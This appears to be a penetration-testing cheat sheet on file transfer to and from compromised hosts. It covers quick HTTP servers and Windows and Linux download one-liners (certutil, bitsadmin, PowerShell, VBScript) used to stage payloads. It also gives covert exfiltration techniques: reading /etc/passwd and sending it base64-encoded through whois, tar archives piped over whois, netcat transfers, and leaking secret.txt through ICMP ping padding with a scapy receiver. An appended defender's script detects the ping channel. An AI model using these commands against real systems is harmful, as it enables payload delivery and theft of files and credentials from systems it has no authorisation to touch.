  • Penetration Testing: File Upload and Download

    1. Setting up an HTTP server to serve downloads

    python2

    python -m SimpleHTTPServer 1337

    python3

    python -m http.server 1337

    PHP 5.4+

    php -S 0.0.0.0:1337

    ruby

    ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
    ruby -run -e httpd . -p 1337

    Perl

    perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
    perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'
     
    busybox httpd
    busybox httpd -f -p 8000

    apache2

    /var/www/html # web root directory
    sudo systemctl start apache2 # start the apache2 service

    2. File download

    wput

    wput dir_name ftp://linuxpig:123456@host.com/

    wget

    wget http://site.com/1.rar -O 1.rar

    aria2c (must be installed)

    aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

    powershell

    $p = New-Object System.Net.WebClient
    $p.DownloadFile("http://domain/file", "C:$env:HOMEPATH\file")

    VBScript

    test.vbs
    Set args = Wscript.Arguments
    Url = "http://domain/file"
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    dim dest: dest = createobject("WScript.Shell").ExpandEnvironmentStrings("C:%homepath%\file")
    xHttp.Open "GET", Url, False
    xHttp.Send
    with bStrm
        .type = 1 ' binary
        .open
        .write xHttp.responseBody
        .savetofile dest, 2 ' overwrite
    end with

    Run: cscript test.vbs

    Perl

    test.pl
    #!/usr/bin/perl
    use LWP::Simple;
    getstore("http://domain/file", "file");

    Run: perl test.pl

    Python

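    test.py
    #!/usr/bin/python
    # Python 2 script (urllib2); on Python 3 use urllib.request.urlopen
    import urllib2
    u = urllib2.urlopen('http://domain/file')
    localFile = open('local_file', 'wb')  # binary mode so the bytes are written unchanged
    localFile.write(u.read())
    localFile.close()

    Run: python test.py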

    Ruby

    test.rb
    #!/usr/bin/ruby
    require 'net/http'
    Net::HTTP.start("www.domain.com") { |http|
      r = http.get("/file")
      open("save_location", "wb") { |file|
        file.write(r.body)
      }
    }

    Run: ruby test.rb

    PHP

    test.php
    <?php
    $url = 'http://www.example.com/file';
    $path = '/path/to/file';
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($ch);
    curl_close($ch);
    file_put_contents($path, $data);
    ?>

    Run: php test.php

    NC

    attacker (local machine):
    cat file | nc -l 1234
    target:
    nc host_ip 1234 > file

    FTP

    ftp 127.0.0.1
    username
    password
    get file
    exit

    TFTP

    tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server

    Bitsadmin

    bitsadmin /transfer n http://domain/file c:\%homepath%\file

    Windows file sharing

    net use x: \\127.0.0.1\share /user:example.com\userID myPassword

    SCP, local to remote

    scp file user@host.com:/tmp

    SCP, remote to local

    scp user@host.com:/tmp file

    rsync: copy files from a remote rsync server to the local machine

    rsync -av root@192.168.78.192::www /databack

    Copy files from the local machine to a remote rsync server

    rsync -av /databack root@192.168.78.192::www

    certutil.exe

    certutil.exe -urlcache -split -f http://site.com/file

    copy

    copy \\IP\ShareName\file.exe file.exe

    WHOIS

    Receiver, Host B:

    nc -vlnp 1337 | sed "s/ //g" | base64 -d

    Sender, Host A:

    whois -h host_ip -p 1337 `cat /etc/passwd | base64`

    WHOIS + TAR

    First:
    ncat -k -l -p 4444 | tee files.b64 # tee to a file so you can make sure you have it

    Next:
    tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits

    Finally:
    cat files.b64 | tr -d ' ' | base64 -d | tar zxv # to get the files out

    PING

    Sender:

    xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

    Receiver, ping_receiver.py:

    ping_receiver.py
    import sys

    try:
        from scapy.all import *
    except ImportError:
        print("Scapy not found, please install scapy: pip install scapy")
        sys.exit(0)

    def process_packet(pkt):
        # Only ICMP echo requests (type 8) carry the sender's data
        if pkt.haslayer(ICMP):
            if pkt[ICMP].type == 8:
                # The last 4 bytes of the payload hold the pattern set with ping -p
                data = pkt[ICMP].load[-4:]
                print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

    sniff(iface="eth0", prn=process_packet)
     
    python3 ping_receiver.py
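
    A defender's view of the PING transfer above, as an added example that is not part of the original article: it flags sources whose ICMP echo requests carry several different repeating fill patterns, which is what a per-chunk ping -p loop produces. The 16-byte timestamp offset, the threshold, the function names and the sample payloads are assumptions constructed for the illustration.

```python
from collections import defaultdict

TS_LEN = 16  # assumption: 64-bit Linux ping puts a 16-byte timestamp first
WIDTH = 4    # chunk size used by the sender above (xxd -p -c 4)

def fill_pattern(payload):
    """Return the repeating WIDTH-byte fill after the timestamp, or None."""
    fill = payload[TS_LEN:]
    if len(fill) < 2 * WIDTH or len(fill) % WIDTH:
        return None
    unit = fill[:WIDTH]
    return unit if unit * (len(fill) // WIDTH) == fill else None

def is_default_fill(payload):
    """Default ping fill: each byte equals its offset in the data (0x10, 0x11, ...)."""
    return all(b == (TS_LEN + i) & 0xFF
               for i, b in enumerate(payload[TS_LEN:]))

def suspicious_sources(echo_requests, min_distinct=3):
    """echo_requests: iterable of (src_ip, payload) from ICMP type 8 packets.

    A source is flagged when its pings carry several different repeating
    fills, the signature of a per-chunk `ping -p` loop. Returns
    {src_ip: fill units joined in arrival order} for the analyst to review.
    """
    units = defaultdict(list)
    for src, payload in echo_requests:
        if is_default_fill(payload):
            continue
        unit = fill_pattern(payload)
        if unit is not None:
            units[src].append(unit)
    return {src: b"".join(seen) for src, seen in units.items()
            if len(set(seen)) >= min_distinct}

def sample_payload(fill=None):
    """Constructed payload: zero timestamp plus 40 bytes of fill."""
    if fill is None:
        return bytes(TS_LEN) + bytes(range(TS_LEN, TS_LEN + 40))
    return bytes(TS_LEN) + fill * 10

# Constructed traffic: normal pings, a fixed test pattern, a changing pattern.
SAMPLE = (
    [("10.0.0.5", sample_payload())] * 3
    + [("10.0.0.7", sample_payload(b"\xaa" * 4))] * 5
    + [("10.0.0.9", sample_payload(c)) for c in (b"cons", b"truc", b"ted!")]
)

if __name__ == "__main__":
    for src, data in suspicious_sources(SAMPLE).items():
        print(src, data)
```

    A single fixed fill (10.0.0.7 in the sample) is left alone because ping -p is also used for link testing; only a fill that keeps changing per packet is reported.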
  • Original article: https://www.cnblogs.com/miruier/p/15024244.html